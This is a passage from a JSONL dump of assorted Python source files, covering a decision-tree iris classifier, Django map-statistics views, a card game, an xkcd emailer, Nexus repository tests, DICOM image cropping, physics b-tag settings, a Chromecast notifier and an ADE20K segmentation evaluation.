y_test)))\nprint(\"训练集上的效果(准确率):{}\".format(algo.score(x_train, y_train)))\nprint(\"测试集上的效果(分类评估报告):\\n{}\".format(classification_report(y_test, test_predict)))\nprint(\"训练集上的效果(分类评估报告):\\n{}\".format(classification_report(y_train, train_predict)))\nprint(\"各个特征的重要性权重系数(值越大,对应的特征属性就越重要):{}\".format(algo.feature_importances_))\n\n\n# 9. 其它\nprint(\"返回的预测概率值:\\n{}\".format(algo.predict_proba(x_test)))\n\n","sub_path":"sklearn11/1117/02_案例代码:基于决策树算法的鸢尾花分类.py","file_name":"02_案例代码:基于决策树算法的鸢尾花分类.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"504413128","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.cache import cache_page\n\nfrom django.contrib.auth.models import User\nfrom mapApp.models.alert_notification import IncidentNotification, HazardNotification, TheftNotification\n\nfrom mapApp.models import Incident, Hazard, Theft, AlertArea, Point\n\n@login_required\ndef stats(request):\n\tuser = request.user\n\n\t# Get the user's alertable points in the last month\n\tcollisions = Incident.objects.filter(p_type__exact=\"collision\") | Incident.objects.filter(p_type__exact=\"fall\")\n\tnearmisses = Incident.objects.filter(p_type__exact=\"nearmiss\")\n\thazards = Hazard.objects.all()\n\tthefts = Theft.objects.all()\n\n\trois = AlertArea.objects.filter(user=user.id)\n\n\t# recent sets = points that intersect an rois as defined by user and are reported in last month\n\tcollisionsInPoly = Incident.objects.none()\n\tnearmissesInPoly = Incident.objects.none()\n\thazardsInPoly = Hazard.objects.none()\n\ttheftsInPoly = Theft.objects.none()\n\t# Find intersecting points\n\tfor g in rois:\n\t\tcollisionsInPoly = collisionsInPoly | collisions.filter(geom__intersects=g.geom)\n\t\tnearmissesInPoly = nearmissesInPoly | nearmisses.filter(geom__intersects=g.geom)\n\t\thazardsInPoly = hazardsInPoly | hazards.filter(geom__intersects=g.geom)\n\t\ttheftsInPoly = theftsInPoly | thefts.filter(geom__intersects=g.geom)\n\n\tcontext = {\n\t\t'user': user,\n\n\t\t'geofences': rois,\n\n\t\t'collisions': collisions,\n\t\t'nearmisses': nearmisses,\n\t\t'hazards': hazards,\n\t\t'thefts': thefts,\n\n\t\t'collisionsInPoly': collisionsInPoly,\n\t\t'nearmissesInPoly': nearmissesInPoly,\n\t\t'hazardsInPoly': hazardsInPoly,\n\t\t'theftsInPoly': theftsInPoly,\n\t}\n\n\treturn render(request, 'mapApp/stats.html', context)\n\n# @cache_page(60 * 15)\ndef vis(request):\n\tincidents = Incident.objects.only('p_type').all()\n\n\tcontext = {\n\t\t'collisions': incidents.filter(p_type__exact=\"collision\"),\n\t\t'nearmisses': incidents.filter(p_type__exact=\"nearmiss\"),\n\t\t'hazards': Hazard.objects.all(),\n\t\t'thefts': Theft.objects.all(),\n\t\t'points': Point.objects.all(),\n\t\t'alertAreas': AlertArea.objects.filter(user=request.user.id)\n\t}\n\treturn render(request, 'mapApp/vis.html', context)\n","sub_path":"mapApp/views/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446965823","text":"\nimport random \n\nclass Player:\n \n present_card = 0\n future_card = 0\n total_points = [300]\n\n def __init__(self):\n pass\n\n def draw(self):\n self.present_card = random.randint(1, 13)\n self.future_card = random.randint(1, 13)\n\n def guess(self):\n print(f\"The card is {self.present_card}\")\n\n ans = input(\"The next card will be higher or lower? l/h: \" ).lower()\n \n print(f\"Next card was {self.future_card}\")\n \n if self.present_card < self.future_card:\n next_card = \"h\"\n elif self.present_card > self.future_card:\n next_card = \"l\"\n elif self.present_card == self.future_card:\n next_card = \"equal\"\n #print (ans, next_card)\n if ans == \"h\":\n result = True\n elif ans == \"l\":\n result = False\n else:\n result = None\n return result\n\n\n def count_points(self): \n guess = self.guess() \n if guess == True:\n self.total_points.append(100)\n elif guess == False:\n self.total_points.append(-75)\n elif guess == None:\n self.total_points.append(0)\n return sum(self.total_points)\n\n","sub_path":"hilo/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575775521","text":"import requests\nimport smtplib\nimport shutil\nimport config\n\nfrom bs4 import BeautifulSoup\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\n\n# Daily xkcd dose - Pulls a random xkcd comic and sends it to you by mail.\n\n\ndef get_image():\n # Finds and loads the image\n header = \"xkcd\"\n r = requests.get(\"https://c.xkcd.com/random/comic/\", header)\n soup = BeautifulSoup(r.text, features=\"html.parser\")\n comic_div = soup.find(id=\"comic\")\n img = comic_div.find(\"img\")\n img_url = img.get(\"src\")\n fixed_img_url = \"https:\" + img_url\n get_image.filename = img.get(\"alt\") + \".png\"\n with requests.get(fixed_img_url, header, stream=\"True\") as r, open(get_image.filename, \"wb\") as fp:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, fp)\n\n\ndef send_mail():\n\n # Message config\n msgRoot = MIMEMultipart(\"related\")\n msgRoot[\"Subject\"] = \"Your daily xkcd dose - \" + get_image.filename\n msgRoot[\"From\"] = config.send_from\n msgRoot[\"To\"] = config.send_to\n\n # Loads image to mail\n fp = open(get_image.filename, \"rb\")\n msgImage = MIMEImage(fp.read())\n fp.close()\n msgImage.add_header(\"Content-ID\", \"\")\n msgRoot.attach(msgImage)\n\n # Starts SMTP connection and sends the mail\n server = smtplib.SMTP_SSL(config.host)\n server.connect(config.host, config.port)\n server.login(config.send_from, config.password)\n server.sendmail(config.send_from, config.send_to, msgRoot.as_string())\n\n\nget_image()\nsend_mail()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383635077","text":"import itertools\nimport pytest\nfrom semver import VersionInfo\n\nfrom nexuscli.api.repository import model\n\n\n@pytest.mark.parametrize(\n 'repo_class',\n pytest.helpers.repositories_by_type(['hosted', 'proxy', 'group']))\ndef test_repository_recipe(repo_class, faker):\n \"\"\"\n For repository classes that accept multiple recipes, ensure the recipe\n given is supported. For other repositories, ensure the recipe given is\n ignored.\n \"\"\"\n accepts_multiple = bool((len(repo_class.RECIPES)-1))\n missing_recipe = faker.pystr()\n\n # TODO: DRY-UP this pattern\n kwargs = {'recipe': missing_recipe}\n if repo_class.TYPE == 'proxy':\n kwargs['remote_url'] = faker.url()\n\n if accepts_multiple:\n with pytest.raises(ValueError):\n repo_class(faker.word(), **kwargs)\n else:\n repo = repo_class(faker.word(), **kwargs)\n assert repo.recipe_name != missing_recipe\n\n\n@pytest.mark.parametrize(\n 'repo_class', pytest.helpers.repositories_by_type('hosted'))\ndef test_upload_file(repo_class, mocker, file_upload_args, faker):\n \"\"\"\n Ensure all hosted repositories have an upload_file method that calls the\n right helper from the upload module.\n \"\"\"\n src_file, _, dst_dir, dst_file = file_upload_args\n\n repo = repo_class(faker.word())\n\n x_upload_method_name = f'upload_file_{repo.recipe_name}'\n upload_method = mocker.Mock()\n # inject mock upload method into upload module\n mock_upload = mocker.patch('nexuscli.api.repository.model.upload')\n mocker.patch.object(mock_upload, x_upload_method_name, upload_method)\n\n repo.upload_file(src_file, dst_dir, dst_file)\n\n upload_method.assert_called_with(repo, src_file, dst_dir, dst_file)\n\n\n@pytest.mark.parametrize(\n 'repo_class', pytest.helpers.repositories_by_type(['proxy', 'group']))\ndef test_upload_missing(repo_class, faker):\n \"\"\"\n Ensure that no proxy, group repositories have upload_* methods\n \"\"\"\n kwargs = {}\n if repo_class.TYPE == 'proxy':\n kwargs['remote_url'] = faker.url()\n\n repo = repo_class(faker.word(), **kwargs)\n\n with pytest.raises(AttributeError):\n repo.upload_file()\n\n with pytest.raises(AttributeError):\n repo.upload_directory()\n\n\n@pytest.mark.parametrize(\n 'repo_class, recurse, flatten', itertools.product(\n pytest.helpers.repositories_by_type('hosted'), # repo_class\n [True, False], # recurse\n [True, False])) # flatten\ndef test_upload_directory(repo_class, recurse, flatten, mocker, faker):\n \"\"\"\n Ensure the method calls upload_file with parameters based on the quantity\n of files in a given directory.\n \"\"\"\n src_dir = model.upload.REMOTE_PATH_SEPARATOR.join(faker.words())\n dst_dir = model.upload.REMOTE_PATH_SEPARATOR.join(faker.words())\n x_subdirectory = faker.pystr()\n x_file_path = faker.pystr()\n\n util = mocker.patch('nexuscli.api.repository.model.util')\n util.get_files.return_value = faker.pylist(10, True, str)\n util.get_upload_subdirectory.return_value = x_subdirectory\n mocker.patch('os.path.join', return_value=x_file_path)\n\n x_get_upload_subdirectory_calls = [\n mocker.call(dst_dir, x_file_path, flatten)\n for _ in util.get_files.return_value # just need the count of calls\n ]\n\n repo = repo_class(faker.word())\n repo.upload_file = mocker.Mock()\n\n repo.upload_directory(src_dir, dst_dir, recurse=recurse, flatten=flatten)\n\n util.get_files.assert_called_with(src_dir, recurse)\n util.get_upload_subdirectory.assert_has_calls(\n x_get_upload_subdirectory_calls)\n repo.upload_file.assert_called_with(x_file_path, x_subdirectory)\n\n\n@pytest.mark.parametrize(\n 'repo_class',\n pytest.helpers.repositories_by_type(['hosted', 'proxy', 'group']))\ndef test_repository_configuration(\n repo_class, mock_nexus_client, faker, gpg_key_as_cwd):\n x_name = faker.word()\n x_cleanup_policy = faker.word()\n x_blob_store_name = faker.word()\n x_remote_url = faker.url()\n x_strict = faker.pybool()\n\n kwargs = {\n 'nexus_client': mock_nexus_client,\n 'cleanup_policy': x_cleanup_policy,\n 'blob_store_name': x_blob_store_name,\n 'strict_content_type_validation': x_strict,\n }\n\n if repo_class.TYPE == 'proxy':\n kwargs['remote_url'] = x_remote_url\n\n repo = repo_class(x_name, **kwargs)\n configuration = repo.configuration\n attributes = configuration['attributes']\n\n assert configuration['name'] == x_name\n assert attributes['cleanup']['policyName'] == [x_cleanup_policy]\n assert attributes['storage']['blobStoreName'] == x_blob_store_name\n assert attributes['storage']['strictContentTypeValidation'] == x_strict\n\n if repo.TYPE and repo.TYPE == 'proxy':\n assert attributes['proxy']['remoteUrl'] == x_remote_url\n\n\n@pytest.mark.parametrize(\n 'yum_repo',\n pytest.helpers.yum_repos()\n)\ndef test_yum_repository_configuration(yum_repo, mock_nexus_client, faker):\n x_name = faker.word()\n x_depth = faker.pyint()\n\n kwargs = {\n 'nexus_client': mock_nexus_client,\n 'depth': x_depth\n }\n\n if yum_repo.TYPE == 'proxy':\n kwargs['remote_url'] = faker.url()\n\n repo = yum_repo(x_name, **kwargs)\n\n assert repo.configuration['attributes']['yum']['repodataDepth'] == x_depth\n\n\n@pytest.mark.parametrize('version,xpolicy', [\n (None, lambda x: [x]),\n (model.CLEANUP_SET_MIN_VERSION, lambda x: [x]),\n (VersionInfo(0, 0, 0), lambda x: x)\n])\ndef test_cleanup_policy(version, xpolicy, mocker, mock_nexus_client, faker):\n \"\"\"\n From CLEANUP_SET_MIN_VERSION, Nexus takes a set of policy names instead\n of a single policy. Ensure the method returns the right type according to\n the version.\n https://github.com/thiagofigueiro/nexus3-cli/issues/77\n \"\"\"\n policy = faker.word()\n\n mock_nexus_client.server_version = version\n repository = model.Repository(\n 'myrepo', nexus_client=mock_nexus_client, cleanup_policy=policy)\n\n assert repository.cleanup_policy == xpolicy(policy)\n","sub_path":"tests/api/repository/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"654122799","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport cv2, os\nimport xlrd\nimport matplotlib.pyplot as plt\nimport readdicom\nimport dataread\n\n\n# 读取dicom图像\ndef read_dicom(path):\n im = readdicom.getImage(path)\n return im\n\n\n# 读取jpg图像\ndef read_jpg(path):\n im = cv2.imread(path)\n return im\n\n\n# 起始点\ny_start = 100\nx_start = 100\ndef cut_center(im):\n ''' 截图图片的中心范围,去掉图片边缘的文字信息\n\n :param im: 要处理的图片\n :return: 处理后的图片\n '''\n return im[y_start: -100, x_start: -100]\n\n# 小图截256 * 256,大图按原始比例截图\n# min_size = 256\n# max_size = 500\n# def get_tophi_loc(list):\n# '''返回对图像进行切割的范围\n#\n# :param list: 四个标记点的坐标信息\n# :param ratio: width/hight的比例\n# :return: 切割范围\n# '''\n# loc = np.array(list)\n# # 获取左上,右下两个点\n# x_min, y_min = np.min(loc, 0)\n# x_max, y_max = np.max(loc, 0)\n# # 获取最小范围宽度和高度\n# width = x_max - x_min\n# hight = y_max - y_min\n#\n# # 默认扩大20个像素点的截取范围(上下左右各20)\n# change_width = 20\n# change_hight = 20\n# # 根据ratio对width或hight进行更正\n# if hight > max_size or width > max_size:\n# # 如果超过了最大范围,则直接按实际比例截图\n# pass\n# elif hight > width:\n# if hight > min_size:\n# new_width = hight\n# change_width = (new_width - width) / 2 + 20\n# else:\n# new_width = min_size\n# new_hight = min_size\n# change_width = (new_width - width) / 2 + 20\n# change_hight = (new_hight - hight) / 2 + 20\n# else:\n# if width > min_size:\n# new_hight = width\n# change_hight = (new_hight - hight) / 2 + 20\n# else:\n# new_width = min_size\n# new_hight = min_size\n# change_width = (new_width - width) / 2 + 20\n# change_hight = (new_hight - hight) / 2 + 20\n#\n# # 对截取范围修正\n# x_min -= change_width\n# x_max += change_width\n# y_min -= change_hight\n# y_max += change_hight\n#\n# return (int(x_min), int(x_max), int(y_min), int(y_max))\ndef get_tophi_loc(list):\n '''返回对图像进行切割的范围\n\n :param list: 四个标记点的坐标信息\n :param ratio: width/hight的比例\n :return: 切割范围\n '''\n loc = np.array(list)\n # 获取左上,右下两个点\n x_min, y_min = np.min(loc, 0)\n x_max, y_max = np.max(loc, 0)\n # 获取最小范围宽度和高度\n width = x_max - x_min\n hight = y_max - y_min\n\n # 默认扩大20个像素点的截取范围(上下左右各20)\n change_width = 20\n change_hight = 20\n if hight > width:\n change_width = (hight - width) / 2 + 20\n else:\n change_hight = (width - hight) / 2 + 20\n\n # 对截取范围修正\n x_min -= change_width\n x_max += change_width\n y_min -= change_hight\n y_max += change_hight\n\n return (int(x_min), int(x_max), int(y_min), int(y_max))\n\n# 随机平移\ndef translation(x_min, x_max, y_min, y_max):\n x = -np.random.randint(30, 60)\n # y = np.random.randint(30, 60)\n x_min += x\n x_max += x\n # y_min += y\n # y_max += y\n\n return (x_min, x_max, y_min, y_max)\n\n\n# 固定标记的坐标信息\nsign_loc = [(1016, 457), (1017, 430), (1006, 457), (1007, 428), (1110, 455), (1111, 428)]\ndef is_sign(pt):\n '''判断坐标pt是否为固定标记\n :param pt: 点的坐标\n :return: True:是固定标记,False:不是\n '''\n for s_loc in sign_loc:\n if np.abs(s_loc[0] - x_start - pt[0]) <= 3 and np.abs(s_loc[1] - y_start - pt[1]) <= 3:\n return True\n return False\n\n\n# 要处理的图像文件夹\nroot_dir = 'all_data'\n\nresult_dir = 'all_result/result/'\nfailed_dir = 'all_result/failed/'\nwrong_dir = 'all_result/wrong/'\n\nresult_num = 1\ndef generate_cut_img(patient_no, label, path, filename):\n \"\"\"对path对应的文件进行切割,同时保存处理失败的文件\n :param pt:\n filename :文件名\n patient_no :病例号\n path :要处理的文件路径\n label :良恶性标签 1 or 2\n :return:\n An `arg_scope` to use for the resnet models.\n \"\"\"\n\n # 生成result的数量\n global result_num\n # 读取后裁剪出中心信息\n im = read_dicom(path)\n im = cut_center(im)\n # plt.imshow(im)\n # plt.show()\n # 保存原图信息,用于后面截取图片\n img_orig = np.copy(im)\n\n # 将图片二值化\n im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n _, im = cv2.threshold(im, 180, 255, type=cv2.THRESH_BINARY)\n\n # 读取标记模版\n template1 = cv2.imread('model_img/model1.jpg', 0)\n template2 = cv2.imread('model_img/model2.jpg', 0)\n templates = [template1, template2]\n\n # 保存四个坐标的信息\n list = []\n # 发现固定标记的个数\n picture_sign_num = 0\n for template in templates:\n w, h = template.shape[::-1]\n # 使用matchTemplate对原始灰度图像和图像模板进行匹配\n res = cv2.matchTemplate(im, template, cv2.TM_CCOEFF_NORMED)\n # 设定阈值\n threshold = 0.85\n # res大于85%\n loc = np.where(res >= threshold)\n\n # 使用灰度图像中的坐标对图像进行标记(画方框)\n for pt in zip(*loc[::-1]):\n # 过滤掉固定标记\n if is_sign(pt):\n picture_sign_num += 1\n continue\n cv2.rectangle(im, pt, (pt[0] + w, pt[1] + h), (255, 255, 255), 2)\n list.append(pt)\n # 显示图像\n\n if len(list) != 4:\n if picture_sign_num > 1:\n # plt.imshow(im)\n # plt.show()\n print(filename, ' process failed')\n if not os.path.exists(failed_dir):\n os.mkdir(failed_dir)\n cv2.imwrite(failed_dir + patient_no + '-' + os.path.splitext(filename)[0] + '.jpg', im)\n else:\n # plt.imshow(im)\n # plt.show()\n print(filename, ' data is wrong')\n if not os.path.exists(wrong_dir):\n os.mkdir(wrong_dir)\n cv2.imwrite(wrong_dir + patient_no + '-' + os.path.splitext(filename)[0] + '.jpg', img_orig)\n else:\n x_min, x_max, y_min, y_max = get_tophi_loc(list)\n # plt.imshow(img_orig[y_min:y_max, x_min:x_max])\n # plt.show()\n\n try:\n # 随机平移\n # x_min, x_max, y_min, y_max = translation(x_min, x_max, y_min, y_max)\n # 保存截取的结果\n if not os.path.exists(result_dir):\n os.mkdir(result_dir)\n result_img = img_orig[y_min:y_max, x_min:x_max]\n result_img = cv2.resize(result_img, (dataread.ROWS, dataread.COLS), interpolation=cv2.INTER_CUBIC)\n result_img = cv2.cvtColor(result_img, cv2.COLOR_BGR2RGB)\n cv2.imwrite(result_dir + str(label) + patient_no + '_' + str(result_num) + '.jpg',\n result_img)\n result_num += 1\n except:\n print(patient_no)\n\n\nif __name__ == '__main__':\n data = pd.read_excel('2.xls', encoding='utf8')\n data = data.loc[:, ['num', 'label', 'dir', 'filename']]\n\n data = data.dropna(axis=0)\n\n for num, label, dir, filename in data.values:\n if os.path.exists(os.path.join(root_dir, dir)):\n for filename in os.listdir(os.path.join(root_dir, dir)):\n path = os.path.join(root_dir, dir, filename)\n generate_cut_img(num, label, path, filename)\n","sub_path":"genetareimage.py","file_name":"genetareimage.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"109880366","text":"from HiggsAnalysis.HeavyChHiggsToTauNu.OptimisationScheme import HPlusOptimisationScheme, Scenario\n\n# There must be 'optimisation' object\noptimisation = HPlusOptimisationScheme()\n\n_N = [1, 2]\n_leadingDiscr = [(\"T\", 0.898), (\"M\", 0.679), (\"L\", 0.244)]\n_subLeadingDiscr = _leadingDiscr[1:]\n\nscenarios = []\n_subScen = []\n\n# Symmetric cuts for at least 1 b jet\nfor leadName,leadCut in _leadingDiscr:\n scenarios.append(Scenario(\"N1discr\"+leadName,\n jetNumber = 1,\n jetNumberCutDirection = \"GEQ\",\n leadingDiscriminatorCut = leadCut))\n\n\n# Symmetric cuts for at least 1 b jet\nfor leadName,leadCut in _leadingDiscr:\n if leadName in [\"L\",\"M\"]:\n scenarios.append(Scenario(\"N2discr\"+leadName,\n jetNumber = 2,\n jetNumberCutDirection = \"GEQ\",\n leadingDiscriminatorCut = leadCut))\n\nscenarios.extend(_subScen)\n\noptimisation.addBTagVariations(scenarios)\n","sub_path":"HeavyChHiggsToTauNu_REMOVEME/python/optimisation/btagSymmetricScenarios.py","file_name":"btagSymmetricScenarios.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"94263651","text":"#!/usr/bin/python3\nfrom __future__ import print_function\nimport sys; sys.path.insert(0,'/usr/local/lib/python3.4/dist-packages/')\nimport time\nimport pychromecast #https://github.com/balloob/pychromecast/tree/master/pychromecast\nfrom gtts import gTTS #https://github.com/pndurette/gTTS\n#import sys\nURL_DOMOTICZ = 'http://127.0.0.1:8080/' # renseigner l'adresse et le port de votre domoticz\nfor arg in sys.argv:\n\tprint(arg)\ntts = gTTS(text=arg, lang='fr', slow=False)\ntts.save(\"/home/pi/domoticz/www/notification.mp3\")\n\nchromecasts = pychromecast.get_chromecasts()\n\n[cc.device.friendly_name for cc in chromecasts]\n['Yamaha'] # mettre le nom de votre chromecast separe par unevirgule ex: ['douche', 'salon', 'cuisine', 'chambre']\n\t\ncast = next(cc for cc in chromecasts )\n\ncast.wait()\n\nmc = cast.media_controller\n\nmc.play_media(URL_DOMOTICZ+'notification.mp3', 'audio/mp3')\n\nmc.block_until_active()\n\nmc.pause()\n#time.sleep(1)\nmc.play()\n","sub_path":"Python/chromecast.py","file_name":"chromecast.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"32868822","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import print_function\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.data import Dataset\r\nimport numpy as np\r\nimport glob\r\nimport json\r\nimport os\r\nimport argparse\r\nfrom models.model import PolygonModel\r\nimport torchvision.transforms as transforms\r\nfrom utils import *\r\nclass Ade20K(Dataset):\r\n def __init__(self, path=None, seq_len=71, transform=None):\r\n super(Ade20K, self).__init__()\r\n self.path = path\r\n self.seq_len = seq_len\r\n self.transform = transform\r\n # print(self.transform)\r\n self.img_path = '/data/duye/ADE20K/validation/'\r\n self.lbl_path = '/data/duye/ADE20K/val_new/label/*.png'\r\n self.labels = glob.glob(self.lbl_path)\r\n # print(self.labels)\r\n self.total_count = len(self.labels)\r\n\r\n def __len__(self):\r\n return self.total_count\r\n\r\n def __getitem__(self, index):\r\n label = Image.open(self.labels[index])\r\n label_index = self.labels[index].split('_')[2]\r\n # 相应的txt文件\r\n txt_file = '/data/duye/ADE20K/val_new/img/img_' + label_index + '.txt'\r\n # print(txt_file)\r\n # 打开txt获取相应的img路径\r\n with open(txt_file, \"r\") as f: # 打开文件\r\n img_path = f.readline().replace('\\n', '') # 读取文件\r\n # 提取路径\r\n img_path = self.img_path + img_path[36:]\r\n # print('img_path:', img_path)\r\n # 提取文件\r\n img = Image.open(img_path).convert('RGB')\r\n\r\n W = img.width\r\n H = img.height\r\n # 根据label\r\n label = np.array(label) # (H, W)\r\n Hs, Ws = np.where(label == np.max(label))\r\n minH = np.min(Hs)\r\n maxH = np.max(Hs)\r\n minW = np.min(Ws)\r\n maxW = np.max(Ws)\r\n curW = maxW - minW\r\n curH = maxH - minH\r\n extendrate = 0.1\r\n extendW = int(round(curW * extendrate))\r\n extendH = int(round(curH * extendrate))\r\n leftW = np.maximum(minW - extendW, 0)\r\n leftH = np.maximum(minH - extendH, 0)\r\n rightW = np.minimum(maxW + extendW, W)\r\n rightH = np.minimum(maxH + extendH, H)\r\n objectW = rightW - leftW\r\n objectH = rightH - leftH\r\n # print(leftH, rightH, leftW, rightW)\r\n img_new = img.crop(box=(leftW, leftH, rightW, rightH)).resize((224, 224), Image.BILINEAR)\r\n img_new = self.transform(img_new)\r\n left_WH = [leftW, leftH]\r\n object_WH = [objectW, objectH]\r\n origion_WH = [W, H]\r\n # 记录Object WH / WH /left WH\r\n gt = label\r\n WH = {'left_WH': left_WH, 'object_WH': object_WH, 'origion_WH': origion_WH}\r\n return img_new, gt, WH\r\n\r\ndef loadAde20K(batch_size, shuffle=False):\r\n \"\"\"\r\n\r\n :param path: train/test/val,数据集名\r\n :param data_num: 实际无用的..\r\n :param len_s: step_num, max-num of vertex,\r\n Based on this statistics, we choose a hard limit of 70 time steps for our RNN,\r\n taking also GPU memory requirements into account.\r\n :param batch_size: bs\r\n :return: dataloader, (bs, img_tensor, first, yt-2,yt-1, label_index)\r\n \"\"\"\r\n transform = transforms.Compose([transforms.ToTensor(), ])\r\n Ade = Ade20K(transform=transform)\r\n dataloader = DataLoader(Ade, batch_size=batch_size, shuffle=shuffle,\r\n drop_last=False)\r\n print('DataLoader complete!', dataloader)\r\n return dataloader\r\n\r\n# 测试得分\r\ndevices = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n\r\ndef get_score_ADE20K(saved=False, maxnum=float('inf')):\r\n model = PolygonModel(predict_delta=True).to(devices)\r\n pre = 'ResNext_Plus_RL2_retain_Epoch1-Step4000_ValIoU0.6316584628283326.pth'\r\n dirs = '/data/duye/pretrained_models/FPNRLtrain/' + pre\r\n model.load_state_dict(torch.load(dirs))\r\n model.eval()\r\n\r\n iou = []\r\n print('starting.....')\r\n img_PATH = '/data/duye/ADE20K/validation/'\r\n lbl_path = '/data/duye/ADE20K/val_new/label/*.png'\r\n labels = glob.glob(lbl_path)\r\n for label in labels:\r\n name = label\r\n label = Image.open(label)\r\n label_index = name.split('_')[2]\r\n # 相应的txt文件\r\n txt_file = '/data/duye/ADE20K/val_new/img/img_' + label_index + '.txt'\r\n with open(txt_file, \"r\") as f: # 打开文件\r\n img_path = f.readline().replace('\\n', '') # 读取文件\r\n # 提取路径\r\n img_path = img_PATH + img_path[36:]\r\n # raw image\r\n img = Image.open(img_path).convert('RGB')\r\n W = img.width\r\n H = img.height\r\n # 根据label\r\n label = np.array(label) # (H, W)\r\n Hs, Ws = np.where(label == np.max(label))\r\n minH = np.min(Hs)\r\n maxH = np.max(Hs)\r\n minW = np.min(Ws)\r\n maxW = np.max(Ws)\r\n curW = maxW - minW\r\n curH = maxH - minH\r\n extendrate = 0.10\r\n extendW = int(round(curW * extendrate))\r\n extendH = int(round(curH * extendrate))\r\n leftW = np.maximum(minW - extendW, 0)\r\n leftH = np.maximum(minH - extendH, 0)\r\n rightW = np.minimum(maxW + extendW, W)\r\n rightH = np.minimum(maxH + extendH, H)\r\n objectW = rightW - leftW\r\n objectH = rightH - leftH\r\n # print(leftH, rightH, leftW, rightW)\r\n # img_new = img.crop(box=(leftW, leftH, rightW, rightH)).resize((224, 224), Image.BILINEAR)\r\n I = np.array(img)\r\n I_obj = I[leftH:rightH, leftW:rightW, :]\r\n # To PIL image\r\n I_obj_img = Image.fromarray(I_obj)\r\n # resize\r\n I_obj_img = I_obj_img.resize((224, 224), Image.BILINEAR)\r\n I_obj_new = np.array(I_obj_img) # (H, W, C)\r\n I_obj_new = I_obj_new.transpose(2, 0, 1) # (C, H, W)\r\n I_obj_new = I_obj_new / 255.0\r\n I_obj_tensor = torch.from_numpy(I_obj_new) # (C, H, W)\r\n I_obj_tensor = torch.tensor(I_obj_tensor.unsqueeze(0), dtype=torch.float).cuda()\r\n\r\n color = [np.random.randint(0, 255) for _ in range(3)]\r\n color += [100]\r\n color = tuple(color)\r\n\r\n with torch.no_grad():\r\n pre_v2 = None\r\n pre_v1 = None\r\n result_dict = model(I_obj_tensor, pre_v2, pre_v1, mode='test', temperature=0.0) # (bs, seq_len)\r\n\r\n # [0, 224] index 0: only one sample in mini-batch here\r\n pred_x = result_dict['final_pred_x'].cpu().numpy()[0]\r\n pred_y = result_dict['final_pred_y'].cpu().numpy()[0]\r\n pred_lengths = result_dict['lengths'].cpu().numpy()[0]\r\n pred_len = np.sum(pred_lengths) - 1 # sub EOS\r\n vertices1 = []\r\n\r\n scaleW = 224.0 / float(objectW)\r\n scaleH = 224.0 / float(objectH)\r\n # Get the pred poly\r\n for i in range(pred_len):\r\n vert = (pred_x[i] / scaleW + leftW,\r\n pred_y[i] / scaleH + leftH)\r\n vertices1.append(vert)\r\n img1 = Image.new('L', (W, H), 0)\r\n ImageDraw.Draw(img1).polygon(vertices1, outline=1, fill=1)\r\n pre_mask = np.array(img1) # (H, W)\r\n\r\n if saved:\r\n try:\r\n drw = ImageDraw.Draw(img, 'RGBA')\r\n drw.polygon(vertices1, color)\r\n except TypeError:\r\n continue\r\n\r\n gt_mask = np.array(label)\r\n gt_mask[gt_mask == 255] = 1\r\n filt = np.sum(gt_mask)\r\n if filt <= 20*20:\r\n continue\r\n intersection = np.logical_and(gt_mask, pre_mask)\r\n union = np.logical_or(gt_mask, pre_mask)\r\n nu = np.sum(intersection)\r\n de = np.sum(union)\r\n # 求IoU\r\n iiou = nu / (de * 1.0) if de != 0 else 0.\r\n iou.append(iiou)\r\n\r\n iou.sort()\r\n iou.reverse()\r\n\r\n print(iou)\r\n print(len(iou))\r\n\r\n print('IoU:', np.mean(np.array(iou)))\r\n\r\nif __name__ == '__main__':\r\n get_score_ADE20K()\r\n\r\n # parse = argparse.ArgumentParser(description='测试在Ade20K上的泛化得分')\r\n # parse.add_argument('-p', '--pretrained', type=str, default=None)\r\n # args = parse.parse_args()\r\n # pre = args.pretrained\r\n #\r\n #\r\n # model = PolygonModel(predict_delta=True).to(devices)\r\n # pre = 'ResNext_Plus_RL2_retain_Epoch1-Step4000_ValIoU0.6316584628283326.pth'\r\n # dirs = '/data/duye/pretrained_models/FPNRLtrain/' + pre\r\n # model.load_state_dict(torch.load(dirs))\r\n # model.eval()\r\n # loader = loadAde20K(batch_size=1)\r\n # iou = []\r\n # print('starting.....')\r\n # for index, batch in enumerate(loader):\r\n # print('index: ', index)\r\n # img = batch[0]\r\n # WH = batch[-1] # WH_dict\r\n # left_WH = WH['left_WH']\r\n # origion_WH = WH['origion_WH']\r\n # object_WH = WH['object_WH']\r\n # gt = batch[1]\r\n # bs = img.shape[0]\r\n # scaleW = 224.0 / float(object_WH[0][0]) # 这里错了?!!!! 竟然会出来0,1啊啊啊,那么可能其他的也会错啊啊啊\r\n # scaleH = 224.0 / float(object_WH[1][0])\r\n # leftW = float(left_WH[0][0])\r\n # leftH = 